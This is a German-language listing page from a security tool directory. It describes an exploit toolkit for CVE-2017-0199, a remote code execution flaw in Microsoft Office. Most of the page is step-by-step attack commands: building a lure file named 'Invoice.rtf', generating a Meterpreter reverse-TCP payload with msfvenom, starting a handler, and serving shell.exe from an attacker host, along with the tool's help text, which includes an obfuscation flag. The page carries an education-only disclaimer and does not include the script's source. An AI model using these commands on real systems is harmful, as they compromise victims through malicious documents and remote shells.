Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-0199 — Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine schädliche RTF/PPSX-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer liefern. | Kitploit
Tools/GitHubGitHub/bhdresh/cve-2017-0199
Payload-GenerierungExploitationWebanwendungs-ExploitationMalware-AnalysePenetrationstestsLernen & Bildung
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

Repository anzeigen
72425614vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine schädliche RTF/PPSX-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer liefern.

Teilen

Exploit-Toolkit CVE-2017-0199 - v4.0

Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine bösartige RTF/PPSX-Datei generieren und einen Metasploit / Meterpreter / anderen Payload an das Opfer liefern, ohne dass eine komplexe Konfiguration erforderlich ist.

Haftungsausschluss

Dieses Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (bhdresh) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionen entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder Missbrauch dieser Programme oder deren Ableitungen. Durch die Nutzung dieses Programms akzeptieren Sie, dass Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme entstehen, nicht in der Verantwortung von bhdresh liegen.

Abschließend handelt es sich um eine persönliche Entwicklung. Bitte respektieren Sie deren Philosophie und verwenden Sie sie nicht für schlechte Dinge!

Lizenz

CC BY 4.0 Lizenz - https://creativecommons.org/licenses/by/4.0/

Versionshinweise:

Dem Skript wurden folgende Fähigkeiten hinzugefügt:

root@kitploit:~
- Generieren einer bösartigen PPSX-Datei
- Exploit-Modus für generierte PPSX-Datei
- Aktualisierte Vorlage.ppsx

Version: Python-Version 2.7.13

Szenario 1: Lokalen Payload bereitstellen

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, falls MSF-Payload verwendet wird): Metasploit-Payload generieren und Handler starten
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Toolkit im Exploit-Modus starten, um lokalen Payload zu liefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Ablaufdiagramm

alt tag

Szenario 2: Remote-Payload bereitstellen

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Toolkit im Exploit-Modus starten, um Remote-Payload zu liefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Ablaufdiagramm

alt tag

Szenario 3: Benutzerdefinierte HTA-Datei bereitstellen

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Toolkit im Exploit-Modus starten, um benutzerdefinierte HTA-Datei zu liefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Ablaufdiagramm

alt tag

Befehlszeilenargumente:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Dies ist ein praktisches Toolkit zur Ausnutzung von CVE-2017-0199 (Microsoft Office RCE)

Modi:

-M gen                                          Nur bösartige Datei generieren

     Bösartige RTF/PPSX-Datei generieren:

      -w <Dateiname.rtf/Dateiname.ppsx>   Name der bösartigen RTF/PPSX-Datei (Diese Datei mit dem Opfer teilen).

      -u <http://angreifer.com/test.hta>   Der Pfad zu einer HTA/SCT-Datei. Normalerweise sollte dies eine Domain oder IP sein, unter der dieses Tool        ausgeführt wird.
                                      Beispiel: http://angreiferip.com/test.doc (Diese URL wird in die bösartige RTF/PPSX-Datei aufgenommen und angefordert, sobald das Opfer die bösartige RTF-Datei öffnet.)
      -t RTF|PPSX (Standard = RTF)         Typ der zu generierenden Datei.
      -x 0|1  (Standard = 0)               Verschleierte RTF-Datei generieren. 0 = Deaktivieren, 1 = Aktivieren.

				      
-M exp                                          Exploit-Modus starten

     Ausnutzung:
 
      -t RTF|PPSX (Standard = RTF)         Typ der auszunutenden Datei.
      -H </tmp/custom>                Lokaler Pfad einer benutzerdefinierten HTA/SCT-Datei, die auf dem Ziel ausgeliefert und ausgeführt werden soll.
                                          HINWEIS: Diese Option liefert keine Payloads, die über die Optionen "-e" und "-l" angegeben wurden.
					  
      -p <TCP-Port: Standard 80>            Lokale Portnummer.

      -e <http://angreifer.com/shell.exe>  Der Pfad zu einer ausführbaren Datei / Meterpreter-Shell / Payload, die auf dem Ziel ausgeführt werden soll.

      -l </tmp/shell.exe>                 Wenn der Payload lokal gehostet wird, geben Sie den lokalen Pfad einer ausführbaren Datei / Meterpreter-Shell / Payload an.

Danksagung

@nixawk für das RTF-Beispiel, @Li Haifei, @bhdresh

Fehler, Probleme, Funktionsanfragen

Offensichtlich bin ich kein Vollzeit-Entwickler, also erwarten Sie einige Hürden.

Bitte melden Sie Fehler und Probleme unter https://github.com/bhdresh/CVE-2017-0199/issues/new

Tool herunterladen